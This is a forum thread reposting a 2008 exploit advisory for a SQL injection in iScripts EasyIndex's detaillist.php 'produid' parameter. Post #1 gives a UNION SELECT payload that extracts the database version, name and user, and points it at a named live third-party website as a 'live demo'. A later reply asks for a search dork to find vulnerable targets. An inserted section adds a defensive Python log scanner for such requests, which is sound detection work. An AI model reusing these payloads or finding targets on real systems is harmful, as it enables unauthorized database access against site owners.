Thread subject: Explore Your Brain :: iScripts EasyIndex (produid) Remote SQL Injection Discovered By SirGod

Posted by EVA-00 on 17-09-2008 13:45
#1

##############################################################
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
##############################################################
[+] Remote SQL Injection


PoC :

http://[target]/[path]/detaillist.php?produid=[SQL]


Example :

http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


Live Demo :

http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


- Note : the number of columns can vary.


##############################################################

# milw0rm.com [2008-09-16]

Edited by EVA-00 on 17-09-2008 13:46
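
A defender-side check for the request pattern shown in post #1, added here as an example that is not part of the original thread or the advisory: it scans web-server access log lines for requests to detaillist.php whose produid is not a plain integer. The combined log format, the assumption that a legitimate produid is an unsigned integer, and every sample line are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log; ".+?" tolerates raw spaces in the target.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
# Assumption: a legitimate produid is a short unsigned integer.
VALID_ID = re.compile(r"\d{1,10}")
# Tokens that make a malformed value worth escalating rather than just counting.
SQL_HINT = re.compile(r"\b(union|select|version|database|user)\b|--|/\*", re.I)

def check_line(line, script="detaillist.php", param="produid"):
    """Return a finding dict if the line carries a non-numeric produid, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/" + script):
        return None
    # parse_qs percent-decodes and maps '+' to space, so encodings are normalised.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if not VALID_ID.fullmatch(value):
            return {"client": line.split(" ", 1)[0], "value": value,
                    "sql_keywords": bool(SQL_HINT.search(value))}
    return None

def scan(lines):
    """Collect findings for every suspicious line, in log order."""
    return [f for f in map(check_line, lines) if f is not None]

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2008:10:00:01 +0000] "GET /iscripts/detaillist.php?produid=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [16/Sep/2008:10:02:11 +0000] "GET /iscripts/detaillist.php?produid=-1%20union%20all%20select%201,2,3 HTTP/1.1" 200 4891',
    '192.0.2.77 - - [16/Sep/2008:10:02:15 +0000] "GET /iscripts/detaillist.php?produid=-1+UNION+ALL+SELECT+1,2,3-- HTTP/1.1" 200 4891',
    '192.0.2.77 - - [16/Sep/2008:10:02:20 +0000] "GET /iscripts/detaillist.php?produid=-1 HTTP/1.1" 200 310',
    '192.0.2.10 - - [16/Sep/2008:10:03:00 +0000] "GET /iscripts/index.php?produid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log scan only shows who has been probing it.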

Posted by squatter7 on 22-02-2009 14:21
#2

@kk ^

Can I ask for the dork for the exploit above??

Posted by EVA-00 on 23-02-2009 03:10
#3

No use, it's been thoroughly patched, bro; dorking doesn't turn up anything anymore either. :victory: